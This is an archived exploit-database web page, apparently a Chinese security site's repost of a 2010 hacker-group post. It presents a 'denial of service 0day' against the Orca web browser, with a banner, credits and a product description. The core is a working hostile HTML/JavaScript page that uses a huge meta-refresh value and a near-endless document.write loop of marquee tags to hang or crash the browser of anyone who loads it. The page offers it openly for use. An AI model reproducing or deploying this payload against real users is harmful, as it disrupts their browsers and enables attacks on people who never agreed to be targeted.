首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Orca Browser Remoter Denial Of Service Exploit 0day
来源:shell_c99[at]yahoo.com 作者:shell_c99 发布时间:2010-06-11  
===================================================
Orca Browser Remoter Denial Of Service Exploit 0day
===================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Orca Browser Remoter Denial Of Service Exploit
Date : june, 10 2010
Vendor url :http://www.orcabrowser.com/
Tested on : Windows XP SP3
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends luv y0 guyz

###############################################################################################################
Description:

Orca Browser is an extremely fast and user friendly web browser, designed to add more functions on to the latest version of Firefox. Not only

does Orca Browser contains all the features, such as security, low memory usage, spell-checker, built-in download manager, etc. from a

typical Gecko based browser, it also improves the speed, adds built-in features like an AD Blocker, Flash Blocker, Online Profile Storage,

auto Form-Filler, and a Outlook-Style RSS Reader. The auto Form-Filler helps to memorize or fill different types of web forms and passwords.

It can also protect them with a master security password. Online Profile Storage allows users to create their own account. With their

username and password, users can choose to save or access their personal data such as bookmarks, AutoFills, and RSS feeds remotely from any

computer.

###############################################################################################################
<html>
<head>
<title>Orca Browser Remoter Denial Of Service Exploit 0day </title></head>
<meta http-equiv="Refresh" content="9999999999999999999999999999999999999999999999">
<title>Orca Browser Remoter Denial Of Service Exploit 0day </title></head>
<center><h1>Sid3^effects from Inj3ct0r Team</h1>
<html>
<body bgcolor="black">
<center>
<font color="blue">
<br>
<br>
<br>
<br>
<script language="javascript">
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+10'>");
for (i =0;i<999999999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
</script>
</center>
</font>
</body>
</html>


###############################################################################################################
# 0day no more
# Sid3^effects

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox 3.6.3 Remoter Denial O
·K-Meleon Remote Denial of Serv
·Solaris/x86 - Sync() & reboot(
·AWCM CMS Local File Inclusion
·Netvolution CMS <= 2.x SQL Inj
·ActivePerl v5.8.8.817 Buffer O
·Microsoft Windows Help Centre
·Netscape Navigator v9.0.0.6 (m
·Safari 5.0 Remote Buffer OverF
·Motorola SB5101 Hax0rware Even
·Adobe InDesign CS3 INDD File H
·Motorola SB5101 Hax0rware Rajk
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved